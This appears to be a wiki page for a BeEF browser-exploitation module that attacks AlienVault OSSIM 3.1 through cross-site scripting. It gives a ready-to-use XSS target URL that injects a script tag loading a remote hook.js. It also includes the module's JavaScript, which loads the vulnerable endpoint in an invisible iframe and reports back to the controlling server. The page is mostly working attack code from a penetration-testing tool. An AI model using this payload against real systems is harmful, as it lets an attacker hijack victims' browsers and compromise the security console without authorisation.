-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: AlienVault OSSIM 3.1 XSS
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: Attempts to hook AlienVault OSSIM 3.1 using XSS
-
Authors: bcoles, muts
-
Browsers: All
Creates an iframe targetting the AlienVault endpoint vulnerable to XSS.
Example target URL:
http://target/ossim/top.php?option=3&soption=3&url=<script src=http://0.0.0.0:3000/hook.js></script>
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
alienvault_iframe_<%= @command_id %>.setAttribute('src', uri);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK